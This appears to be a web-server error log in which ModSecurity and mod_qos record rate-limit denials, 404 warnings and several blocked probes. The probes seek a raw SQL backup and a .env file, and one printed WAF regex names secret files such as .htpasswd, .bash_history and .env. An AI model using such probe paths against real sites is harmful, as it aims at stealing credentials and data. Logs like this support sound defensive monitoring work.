[Tue May 26 19:53:46.776707 2026] [security2:error] [pid 86490:tid 86738] [client 76.136.2.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtRwAAAPs"]
[Tue May 26 19:53:46.780807 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtpAAAAIc
[Tue May 26 19:53:46.885428 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtpgAAAPw
[Tue May 26 19:53:46.893329 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtpwAAAKQ
[Tue May 26 19:53:46.904691 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLIQAAABk
[Tue May 26 19:53:46.904693 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtqQAAAL4
[Tue May 26 19:53:46.904882 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtqgAAAN0
[Tue May 26 19:53:46.906768 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtqwAAAJE
[Tue May 26 19:53:46.909749 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtrAAAAOs
[Tue May 26 19:53:46.919572 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8mDRMqfxdEDkoszLIgAAAEE
[Tue May 26 19:53:46.922052 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtrQAAANU
[Tue May 26 19:53:46.931536 2026] [qos:error] [pid 86490:tid 86655] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs8lZMwN0DpLVWo6KtrgAAAKg
[Tue May 26 19:53:46.960555 2026] [security2:error] [pid 93576:tid 93830] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLEwAAAHY"]
[Tue May 26 19:53:47.038792 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35144] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtuAAAAQA
[Tue May 26 19:53:47.041123 2026] [qos:error] [pid 86490:tid 86671] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtuQAAALg
[Tue May 26 19:53:47.057375 2026] [qos:error] [pid 86490:tid 86622] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtugAAAIc
[Tue May 26 19:53:47.057785 2026] [qos:error] [pid 86490:tid 86641] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtuwAAAJo
[Tue May 26 19:53:47.058741 2026] [qos:error] [pid 93576:tid 93758] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLJAAAAC4
[Tue May 26 19:53:47.058972 2026] [qos:error] [pid 86490:tid 86645] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtvQAAAJ4
[Tue May 26 19:53:47.065902 2026] [qos:error] [pid 86490:tid 86660] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtvgAAAK0
[Tue May 26 19:53:47.067487 2026] [qos:error] [pid 93576:tid 93813] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLJQAAAGU
[Tue May 26 19:53:47.070342 2026] [qos:error] [pid 86490:tid 86637] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtwAAAAJY
[Tue May 26 19:53:47.082187 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtwQAAAMQ
[Tue May 26 19:53:47.209124 2026] [qos:error] [pid 86490:tid 86739] [client 45.148.10.120:34866] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtwgAAAPw
[Tue May 26 19:53:47.211222 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLJgAAAEk
[Tue May 26 19:53:47.212921 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34934] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtwwAAAKQ
[Tue May 26 19:53:47.213415 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtxAAAAL8
[Tue May 26 19:53:47.219506 2026] [qos:error] [pid 86490:tid 86708] [client 45.148.10.120:34856] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtxgAAAN0
[Tue May 26 19:53:47.219852 2026] [qos:error] [pid 86490:tid 86677] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtxQAAAL4
[Tue May 26 19:53:47.219943 2026] [qos:error] [pid 93576:tid 93811] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLJwAAAGM
[Tue May 26 19:53:47.234482 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtxwAAAOs
[Tue May 26 19:53:47.271056 2026] [qos:error] [pid 86490:tid 86743] [client 45.148.10.120:35072] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KtyQAAAQA
[Tue May 26 19:53:47.273017 2026] [security2:error] [pid 93867:tid 94106] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrEwAAAUg"]
[Tue May 26 19:53:47.291380 2026] [security2:error] [pid 93576:tid 93790] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszLAQAAAE4"]
[Tue May 26 19:53:47.291453 2026] [security2:error] [pid 93867:tid 94045] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrEgAAASk"]
[Tue May 26 19:53:47.299049 2026] [security2:error] [pid 86490:tid 86718] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtEQAAAOc"]
[Tue May 26 19:53:47.304170 2026] [security2:error] [pid 86490:tid 86675] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtBQAAALw"]
[Tue May 26 19:53:47.306274 2026] [security2:error] [pid 86490:tid 86735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtGAAAAPg"]
[Tue May 26 19:53:47.320131 2026] [security2:error] [pid 93867:tid 94020] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrFAAAARA"]
[Tue May 26 19:53:47.324545 2026] [security2:error] [pid 86490:tid 86740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtKwAAAP0"]
[Tue May 26 19:53:47.329421 2026] [security2:error] [pid 86490:tid 86702] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtOgAAANc"]
[Tue May 26 19:53:47.329443 2026] [security2:error] [pid 93867:tid 94028] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrGAAAARg"]
[Tue May 26 19:53:47.343189 2026] [security2:error] [pid 86490:tid 86654] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtOQAAAKc"]
[Tue May 26 19:53:47.348851 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszLAgAAAA8"]
[Tue May 26 19:53:47.364081 2026] [security2:error] [pid 93867:tid 94091] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8pCDfrjqoHpuuBKrIAAAAUE"]
[Tue May 26 19:53:47.370823 2026] [security2:error] [pid 86490:tid 86646] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtYAAAAJ8"]
[Tue May 26 19:53:47.375743 2026] [security2:error] [pid 93867:tid 94118] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrFwAAAU4"]
[Tue May 26 19:53:47.381470 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8WDRMqfxdEDkoszK_wAAAGQ"]
[Tue May 26 19:53:47.390173 2026] [security2:error] [pid 86490:tid 86688] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtZwAAAMk"]
[Tue May 26 19:53:47.396424 2026] [security2:error] [pid 93867:tid 94042] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8pCDfrjqoHpuuBKrHwAAASY"]
[Tue May 26 19:53:47.402149 2026] [security2:error] [pid 86490:tid 86664] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtUwAAALE"]
[Tue May 26 19:53:47.409155 2026] [security2:error] [pid 93867:tid 94036] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8ZCDfrjqoHpuuBKrGgAAASA"]
[Tue May 26 19:53:47.409780 2026] [security2:error] [pid 93867:tid 94077] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8pCDfrjqoHpuuBKrHgAAATo"]
[Tue May 26 19:53:47.417750 2026] [security2:error] [pid 86490:tid 86666] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8VZMwN0DpLVWo6KtOAAAALM"]
[Tue May 26 19:53:47.418412 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtZQAAAMo"]
[Tue May 26 19:53:47.435227 2026] [security2:error] [pid 86490:tid 86734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtYgAAAPc"]
[Tue May 26 19:53:47.443977 2026] [security2:error] [pid 93576:tid 93815] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLEgAAAGc"]
[Tue May 26 19:53:47.449004 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8lZMwN0DpLVWo6KtVAAAAIU"]
[Tue May 26 19:53:47.556927 2026] [qos:error] [pid 93576:tid 93832] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLOwAAAHg
[Tue May 26 19:53:47.558928 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuAwAAAL0
[Tue May 26 19:53:47.559048 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuBAAAANk
[Tue May 26 19:53:47.560678 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuBQAAAIU
[Tue May 26 19:53:47.572385 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuBgAAAPY
[Tue May 26 19:53:47.573813 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuBwAAAOs
[Tue May 26 19:53:47.584232 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuCAAAAI0
[Tue May 26 19:53:47.586216 2026] [security2:error] [pid 86490:tid 86661] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/backup/settings.sql"] [unique_id "ahWs81ZMwN0DpLVWo6KuCQAAAK4"]
[Tue May 26 19:53:47.595644 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuCgAAAQE
[Tue May 26 19:53:47.604676 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuDQAAAMI
[Tue May 26 19:53:47.649283 2026] [security2:error] [pid 86490:tid 86521] [remote 74.7.241.58:42790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWs81ZMwN0DpLVWo6KuDwAA2B4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-admin
[Tue May 26 19:53:47.690820 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLPAAAAHs
[Tue May 26 19:53:47.709455 2026] [qos:error] [pid 93576:tid 93796] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs82DRMqfxdEDkoszLPQAAAFQ
[Tue May 26 19:53:47.709569 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuEAAAALM
[Tue May 26 19:53:47.710447 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuEQAAAJ0
[Tue May 26 19:53:47.712187 2026] [qos:error] [pid 86490:tid 86740] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuEgAAAP0
[Tue May 26 19:53:47.724706 2026] [qos:error] [pid 86490:tid 86702] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuEwAAANc
[Tue May 26 19:53:47.725362 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuFAAAAL0
[Tue May 26 19:53:47.731494 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuFQAAANk
[Tue May 26 19:53:47.754231 2026] [security2:error] [pid 86490:tid 86620] [client 185.177.72.53:4966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/env_config/.env"] [unique_id "ahWs81ZMwN0DpLVWo6KuFgAAAIU"]
[Tue May 26 19:53:47.823160 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuFwAAAI0
[Tue May 26 19:53:47.972837 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuHQAAALM
[Tue May 26 19:53:47.972846 2026] [qos:error] [pid 86490:tid 86644] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs81ZMwN0DpLVWo6KuHgAAAJ0
[Tue May 26 19:53:48.156837 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35242] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLQgAAAEQ
[Tue May 26 19:53:48.164379 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:35252] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9GDRMqfxdEDkoszLQwAAAGo
[Tue May 26 19:53:48.164937 2026] [qos:error] [pid 86490:tid 86623] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuIwAAAIg
[Tue May 26 19:53:48.170900 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuJAAAAPY
[Tue May 26 19:53:48.173493 2026] [qos:error] [pid 86490:tid 86664] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuJQAAALE
[Tue May 26 19:53:48.187394 2026] [qos:error] [pid 86490:tid 86722] [client 45.148.10.120:35054] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuJgAAAOs
[Tue May 26 19:53:48.188048 2026] [qos:error] [pid 86490:tid 86690] [client 45.148.10.120:35324] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuJwAAAMs
[Tue May 26 19:53:48.190400 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35078] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuKAAAAI0
[Tue May 26 19:53:48.229756 2026] [qos:error] [pid 86490:tid 86632] [client 45.148.10.120:35170] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuKQAAAJE
[Tue May 26 19:53:48.233301 2026] [qos:error] [pid 86490:tid 86683] [client 45.148.10.120:35014] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs9FZMwN0DpLVWo6KuKgAAAMQ
[Tue May 26 19:53:48.275996 2026] [security2:error] [pid 93576:tid 93809] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs8mDRMqfxdEDkoszLEQAAAGE"]
